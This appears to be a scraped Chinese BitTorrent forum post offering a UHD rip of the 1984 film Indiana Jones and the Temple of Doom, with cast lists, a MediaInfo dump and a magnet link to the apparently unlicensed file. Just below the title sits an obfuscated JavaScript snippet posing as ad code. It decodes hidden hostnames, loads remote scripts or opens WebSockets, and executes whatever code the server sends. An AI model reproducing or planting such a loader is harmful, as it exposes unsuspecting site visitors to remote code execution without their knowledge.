夺宝奇兵2[国英多音轨/简繁字幕].Indiana.Jones.and.the.Temple.of.Doom.1984.UHD.BluRay.2160p.2Audio.TrueHD.Atmos.7.1.x265.10bit.HDR 30.23GB

版主小s 1月前 167

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 夺宝奇兵2 / 印地安纳·琼斯和魔域奇兵 / 夺宝奇兵2:魔域奇兵 / 魔域奇兵 / 印地安纳·琼斯之魔域奇兵 / 印地安纳·琼斯与墓室 / 魔宫传奇
◎片  名 Indiana Jones and the Temple of Doom
◎年  代 1984
◎产  地 美国 / 英国
◎类  别 动作 / 冒险
◎语  言 英语 / 僧伽罗语 / 上海话 / 粤语
◎上映日期 1984-05-23(美国)
◎IMDb链接 https://www.imdb.com/title/tt0087469/
◎豆瓣评分 7.8/10 (47549人评价)
◎豆瓣链接 https://movie.douban.com/subject/1301434/
◎片  长 118分钟
◎导  演 史蒂文·斯皮尔伯格 Steven Spielberg (id:1054440)
◎编  剧 威拉德·赫依克 Willard Huyck (id:1050370)
       格洛丽亚·卡茨 Gloria Katz (id:1288204)
       乔治·卢卡斯 George Lucas (id:1054507)
◎演  员 哈里森·福特 Harrison Ford (id:1009238)
       凯特·卡普肖 Kate Capshaw (id:1040572)
       关继威 Jonathan Ke Quan (id:1022565)
       阿莫瑞什·普瑞 Amrish Puri (id:1054235)
       罗珊·塞斯 Roshan Seth (id:1137886)
       乔治·卢卡斯 George Lucas (id:1054507)
       巴斯卡尔·帕特尔 Bhasker Patel (id:1065963)
       里克·扬 Ric Young (id:1275648)
       丹·艾克罗伊德 Dan Aykroyd (id:1010562)
       叶西园 David Yip (id:1167632)
       西德尼·甘尼斯 Sidney Ganis (id:1014575)
       菲利普·丹 Philip Tan (id:1298892)
       乔宏 Roy Chiao (id:1032432)
       菲利普·斯通 Philip Stone (id:1149637)
       安东尼·鲍威尔 Anthony Powell (id:1131122)
       帕特·罗奇 Pat Roach (id:1045132)
       Denavaka Hamine Denavaka Hamine (id:1093689)
       弗兰克·马歇尔 Frank Marshall (id:1049939)
       Arthur F. Repola Arthur F. Repola (id:1023816)
       罗伯特·沃茨 Robert Watts (id:1300525)
       乔治·卢卡斯 George Lucas (id:1054507)
       凯瑟琳·肯尼迪 Kathleen Kennedy (id:1019168)
       弗兰克·马歇尔 Frank Marshall (id:1049939)
       约翰·威廉姆斯 John Williams (id:1054692)
       道格拉斯·斯洛科姆 Douglas Slocombe (id:1007237)
       乔治·卢卡斯 George Lucas (id:1054507)
       迈克尔·卡恩 Michael Kahn (id:1037019)
       迈克·芬顿 Mike Fenton (id:1283570)
       玛丽·塞尔维 Mary Selway (id:1036236)
       彼得·霍威特 Peter Howitt (id:1287039)
       艾略特·斯科特 Elliot Scott (id:1012786)
       安东尼·鲍威尔 Anthony Powell (id:1131122)
       琳达·古拉西希 Lynda Gurasich (id:1285651)
       彼得·罗勃-金 Peter Robb-King (id:1295741)
       科林·贾米森 Colin Jamison (id:1287572)
       琳达·德维塔 Linda DeVetta (id:1282321)
       汤姆·史密斯 Tom Smith (id:1157406)
       伊安·布莱斯 Ian Bryce (id:1279526)
       弗兰克·马歇尔 Frank Marshall (id:1049939)
       Carlos Gil Carlos Gil (id:1094312)
       Louis Race Louis Race (id:1035720)
       迈克尔·D·穆尔 Michael D. Moore (id:1028085)
       大卫·汤布林 David Tomblin (id:1028731)
       Rick Fichter Rick Fichter (id:1283660)
       Lance Brackett Lance Brackett (id:1070546)
       比尔·乔治 Bill George (id:1284713)
       John McLeod John McLeod (id:1291681)
       杰克·莫多万 Jack Mongovan (id:1292344)
       Charlie Mullen Charlie Mullen (id:1292681)
       布鲁斯·尼科尔森 Bruce Nicholson (id:1293146)
       Dave Childers Dave Childers (id:1072607)
       迈克尔·J·麦卡利斯特尔 Michael J. McAlister (id:1291408)
       克里斯托弗·埃文斯 Christopher Evans (id:1283336)
       Ned Gorman Ned Gorman (id:1285204)
       芭芭拉·布伦南 Barbara Brennan (id:1279246)
       克莱格·巴朗 Craig Barron (id:1277981)
       爱德华·赫希 Edward Hirsh (id:1286690)
       Suki Stern Suki Stern (id:1156154)
       保罗·哈特森 Paul Huston (id:1287204)
       埃德·琼斯 Ed Jones (id:1287861)
       迈克尔·欧文斯 Michael Owens (id:1293758)
       菲尔 蒂贝特 Phil Tippett (id:1299349)
       约翰·埃利斯 John Ellis (id:1305506)
       大卫·芬奇 David Fincher (id:1012521)
       布鲁斯·沃尔特斯 Bruce Walters (id:1300370)
       Michael Gleason Michael Gleason (id:1013136)
       Charles Bailey Charles Bailey (id:1277693)
       Pat Sweeney Pat Sweeney (id:1298721)
       Arthur F. Repola Arthur F. Repola (id:1023816)
       David Sosalla David Sosalla (id:1298080)
       Tom St. Amand Tom St. Amand (id:1298210)
       Michael Pangrazio Michael Pangrazio (id:1293881)
       丹尼斯·穆伦 Dennis Muren (id:1041635)
       洛尔恩·彼得森 Lorne Peterson (id:1294386)
       Thomas G. Smith Thomas G. Smith (id:1297955)
       托马斯·罗塞特 Thomas Rosseter (id:1296146)

◎标  签 冒险 / 美国 / 动作 / 斯皮尔伯格 / 探险 / 经典 / 美国电影 / 1984

◎简  介
  中国,印第安纳琼斯博士(Harrison Ford饰)与上海黑帮老大交易,对方在换得努尔哈赤的骨灰后便背信弃义,欲灭琼斯之口。关键时刻,机灵小鬼豆丁(Jonathan Ke Quan饰)救下琼斯博士和无故卷进的一位歌女威莉(Kate Capshaw饰)。                                    
                                由于三人乘坐的飞机失事,跳机后,乘着橡皮艇,他们竟漂流到了印度的一个村子。这里河水干涸,庄稼尽毁,饥荒横行,民不聊生。当地人将之归咎为彭高皇宫的妖孽作怪,并将“从天而降”的琼斯一行视为神灵的化身,他们请求琼斯帮他们拿回被掳走的圣石和所有的小孩子。                                    
                                魔宫果然充满古怪,统治者是个小屁孩,贵族们吃水蛭、巨蟒、甲虫、猴脑,皇宫内部更是机关重重,误打误撞间,他们目睹到血腥的邪教献祭仪式……这一仗注定艰苦异常!

◎获奖情况 (共2项)
  第57届奥斯卡金像奖 (1985)
  最佳视觉效果
  最佳原创配乐(提名)
   └──约翰·威廉姆斯 (id:1054692)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 15433751347140210715547881853520842163 (0xB9C6EB0F0468E39EFDE7048018A0DB3)

  4. Complete name                            : Indiana.Jones.and.the.Temple.of.Doom.198[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 30.2 GiB

  8. Duration                                 : 1 h 58 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 36.5 Mb/s

  11. Encoded date                             : UTC 2021-08-03 03:37:11

  12. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. HDR format                               : SMPTE ST 2086, HDR10 compatible

  20. Codec ID                                 : V_MPEGH/ISO/HEVC

  21. Duration                                 : 1 h 58 min

  22. Bit rate                                 : 25.2 Mb/s

  23. Width                                    : 3 840 pixels

  24. Height                                   : 1 634 pixels

  25. Display aspect ratio                     : 2.35:1

  26. Frame rate mode                          : Constant

  27. Frame rate                               : 23.976 (24000/1001/53354) FPS

  28. Color space                              : YUV

  29. Chroma subsampling                       : 4:2:0 (Type 2)

  30. Bit depth                                : 10 bits

  31. Bits/(Pixel*Frame)                       : 0.167

  32. Stream size                              : 20.8 GiB (69%)

  33. Title                                    : HEVC, [email protected]@High, 24/1.001 fps @ 25153 kbps

  34. Writing library                          : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings                        : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1634 / interlace=0 / total-frames=170393 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=1000,346 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language                                 : English

  37. Default                                  : Yes

  38. Forced                                   : No

  39. Color range                              : Limited

  40. Color primaries                          : BT.2020

  41. Transfer characteristics                 : PQ

  42. Matrix coefficients                      : BT.2020 non-constant

  43. Mastering display color primaries        : Display P3

  44. Mastering display luminance              : min: 0.0050 cd/m2, max: 4000 cd/m2

  45. Maximum Content Light Level              : 1000 cd/m2

  46. Maximum Frame-Average Light Level        : 346 cd/m2


  47. Audio #1

  48. ID                                       : 2

  49. Format                                   : MLP FBA 16-ch

  50. Format/Info                              : Meridian Lossless Packing FBA with 16-channel presentation

  51. Commercial name                          : Dolby TrueHD with Dolby Atmos

  52. Codec ID                                 : A_TRUEHD

  53. Duration                                 : 1 h 58 min

  54. Bit rate mode                            : Variable

  55. Bit rate                                 : 4 320 kb/s

  56. Maximum bit rate                         : 6 240 kb/s

  57. Channel(s)                               : 8 channels

  58. Channel layout                           : L R C LFE Ls Rs Lb Rb

  59. Sampling rate                            : 48.0 kHz

  60. Frame rate                               : 1 200.000 FPS (40 SPF)

  61. Compression mode                         : Lossless

  62. Stream size                              : 3.57 GiB (12%)

  63. Title                                    : English Dolby TrueHD 7.1 (Atmos) @ 4960 kbps

  64. Language                                 : English

  65. Default                                  : Yes

  66. Forced                                   : No

  67. Number of dynamic objects                : 11

  68. Bed channel count                        : 1 channel

  69. Bed channel configuration                : LFE


  70. Audio #2

  71. ID                                       : 3

  72. Format                                   : AC-3

  73. Format/Info                              : Audio Coding 3

  74. Commercial name                          : Dolby Digital

  75. Codec ID                                 : A_AC3

  76. Duration                                 : 1 h 58 min

  77. Bit rate mode                            : Constant

  78. Bit rate                                 : 640 kb/s

  79. Channel(s)                               : 6 channels

  80. Channel layout                           : L R C LFE Ls Rs

  81. Sampling rate                            : 48.0 kHz

  82. Frame rate                               : 31.250 FPS (1536 SPF)

  83. Compression mode                         : Lossy

  84. Stream size                              : 542 MiB (2%)

  85. Title                                    : English Dolby Digital Audio 5.1 @ 640 kbps

  86. Language                                 : English

  87. Service kind                             : Complete Main

  88. Default                                  : No

  89. Forced                                   : No


  90. Audio #3

  91. ID                                       : 4

  92. Format                                   : DTS

  93. Format/Info                              : Digital Theater Systems

  94. Codec ID                                 : A_DTS

  95. Duration                                 : 1 h 58 min

  96. Bit rate mode                            : Constant

  97. Bit rate                                 : 754 kb/s

  98. Channel(s)                               : 6 channels

  99. Channel layout                           : C L R Ls Rs LFE

  100. Sampling rate                            : 48.0 kHz

  101. Frame rate                               : 93.750 FPS (512 SPF)

  102. Bit depth                                : 24 bits

  103. Compression mode                         : Lossy

  104. Stream size                              : 639 MiB (2%)

  105. Title                                    : Mandarin DTS 5.1 @ 768 kbps (驴脾气混音)

  106. Language                                 : English

  107. Default                                  : No

  108. Forced                                   : No


  109. Audio #4

  110. ID                                       : 5

  111. Format                                   : DTS XLL

  112. Format/Info                              : Digital Theater Systems

  113. Commercial name                          : DTS-HD Master Audio

  114. Codec ID                                 : A_DTS

  115. Duration                                 : 1 h 58 min

  116. Bit rate mode                            : Variable

  117. Bit rate                                 : 5 478 kb/s

  118. Channel(s)                               : 8 channels

  119. Channel layout                           : C L R LFE Lb Rb Lss Rss

  120. Sampling rate                            : 48.0 kHz

  121. Frame rate                               : 93.750 FPS (512 SPF)

  122. Bit depth                                : 24 bits

  123. Compression mode                         : Lossless

  124. Stream size                              : 4.53 GiB (15%)

  125. Title                                    : DTS-HD Master Audio 7.1 @ 4623 kbps (重编码)

  126. Language                                 : English

  127. Default                                  : No

  128. Forced                                   : No


  129. Text #1

  130. ID                                       : 6

  131. Format                                   : PGS

  132. Codec ID                                 : S_HDMV/PGS

  133. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  134. Duration                                 : 1 h 52 min

  135. Bit rate                                 : 17.8 kb/s

  136. Count of elements                        : 1734

  137. Stream size                              : 14.3 MiB (0%)

  138. Title                                    : Eng/SUP

  139. Language                                 : English

  140. Default                                  : No

  141. Forced                                   : No


  142. Text #2

  143. ID                                       : 7

  144. Format                                   : PGS

  145. Codec ID                                 : S_HDMV/PGS

  146. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  147. Duration                                 : 1 h 52 min

  148. Bit rate                                 : 22.3 kb/s

  149. Count of elements                        : 2234

  150. Stream size                              : 18.0 MiB (0%)

  151. Title                                    : Eng/SUP  SDH

  152. Language                                 : English

  153. Default                                  : No

  154. Forced                                   : No


  155. Text #3

  156. ID                                       : 8

  157. Format                                   : PGS

  158. Codec ID                                 : S_HDMV/PGS

  159. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  160. Duration                                 : 1 h 57 min

  161. Bit rate                                 : 12.3 kb/s

  162. Count of elements                        : 1606

  163. Stream size                              : 10.4 MiB (0%)

  164. Title                                    : Chs/SUP  原盘简体

  165. Language                                 : Chinese

  166. Default                                  : Yes

  167. Forced                                   : No


  168. Text #4

  169. ID                                       : 9

  170. Format                                   : PGS

  171. Codec ID                                 : S_HDMV/PGS

  172. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  173. Duration                                 : 1 h 57 min

  174. Bit rate                                 : 10.8 kb/s

  175. Count of elements                        : 1244

  176. Stream size                              : 9.06 MiB (0%)

  177. Title                                    : Cht/SUP  原盘繁体(HK)

  178. Language                                 : Chinese

  179. Default                                  : No

  180. Forced                                   : No


  181. Text #5

  182. ID                                       : 10

  183. Format                                   : PGS

  184. Codec ID                                 : S_HDMV/PGS

  185. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  186. Duration                                 : 1 h 57 min

  187. Bit rate                                 : 11.5 kb/s

  188. Count of elements                        : 1510

  189. Stream size                              : 9.70 MiB (0%)

  190. Title                                    : Cht/SUP  原盘繁体(TW)

  191. Language                                 : Chinese

  192. Default                                  : No

  193. Forced                                   : No


  194. Text #6

  195. ID                                       : 11

  196. Format                                   : PGS

  197. Codec ID                                 : S_HDMV/PGS

  198. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  199. Duration                                 : 1 h 53 min

  200. Bit rate                                 : 22.2 kb/s

  201. Count of elements                        : 1721

  202. Stream size                              : 18.1 MiB (0%)

  203. Title                                    : Chs/SUP  简英双语

  204. Language                                 : Chinese

  205. Default                                  : No

  206. Forced                                   : No


  207. Text #7

  208. ID                                       : 12

  209. Format                                   : PGS

  210. Codec ID                                 : S_HDMV/PGS

  211. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  212. Duration                                 : 1 h 53 min

  213. Bit rate                                 : 22.8 kb/s

  214. Count of elements                        : 1721

  215. Stream size                              : 18.6 MiB (0%)

  216. Title                                    : Cht/SUP  繁英双语

  217. Language                                 : Chinese

  218. Default                                  : No

  219. Forced                                   : No


  220. Menu

  221. 00:00:00.000                             : en:第 01 章

  222. 00:02:55.050                             : en:第 02 章

  223. 00:08:07.278                             : en:第 03 章

  224. 00:10:52.735                             : en:第 04 章

  225. 00:12:51.479                             : en:第 05 章

  226. 00:16:00.543                             : en:第 06 章

  227. 00:19:50.189                             : en:第 07 章

  228. 00:26:28.837                             : en:第 08 章

  229. 00:28:42.971                             : en:第 09 章

  230. 00:31:49.032                             : en:第 10 章

  231. 00:35:20.327                             : en:第 11 章

  232. 00:38:56.918                             : en:第 12 章

  233. 00:41:20.520                             : en:第 13 章

  234. 00:46:24.323                             : en:第 14 章

  235. 00:50:42.957                             : en:第 15 章

  236. 00:52:06.582                             : en:第 16 章

  237. 00:56:08.365                             : en:第 17 章

  238. 00:59:57.219                             : en:第 18 章

  239. 01:05:57.078                             : en:第 19 章

  240. 01:09:52.021                             : en:第 20 章

  241. 01:13:08.551                             : en:第 21 章

  242. 01:17:08.290                             : en:第 22 章

  243. 01:24:01.954                             : en:第 23 章

  244. 01:27:33.331                             : en:第 24 章

  245. 01:29:21.106                             : en:第 25 章

  246. 01:35:03.448                             : en:第 26 章

  247. 01:39:23.875                             : en:第 27 章

  248. 01:41:51.314                             : en:第 28 章

  249. 01:43:38.796                             : en:第 29 章

  250. 01:49:57.633                             : en:第 30 章

  251. 01:53:10.867                             : en:第 31 章



TAGS 动作 冒险

磁力链:
  • magnet:?xt=urn:btih:8A5F19806B3D6DA74656C89111FD60068965BCDB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回